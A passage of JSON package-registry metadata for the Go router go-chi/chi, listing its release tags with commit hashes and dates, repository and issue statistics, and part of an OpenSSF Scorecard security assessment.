ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.267Z","dependent_packages_count":55,"downloads":null,"downloads_period":null,"dependent_repos_count":41,"rankings":{"downloads":null,"dependent_repos_count":0.8836942944762363,"dependent_packages_count":0.64311116828577,"stargazers_count":0.488011265946437,"forks_count":0.8836260087398193,"docker_downloads_count":null,"average":0.7246106843620657},"purl":"pkg:golang/github.com/go-chi/chi/v4","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chi/chi/v4","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chi/chi/v4","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chi/chi/v4/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chi%2Fchi%2Fv4/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":3535551,"name":"gopkg.in/chi.v3","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in","versions_count":15,"first_release_published_at":"2017-06-21T19:28:24.000Z","latest_release_published_at":"2023-09-07T09:46:43.000Z","latest_release_number":"v3.3.5","last_synced_at":"2026-08-12T02:06:17.585Z","created_at":"2022-04-10T23:48:08.828Z","updated_at":"2026-08-12T02:06:17.585Z","registry_url":"https://pkg.go.dev/gopkg.in/chi.v3","install_command":"go get gopkg.in/chi.v3","documentation_url":"https://pkg.go.dev/gopkg.in/chi.v3#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in 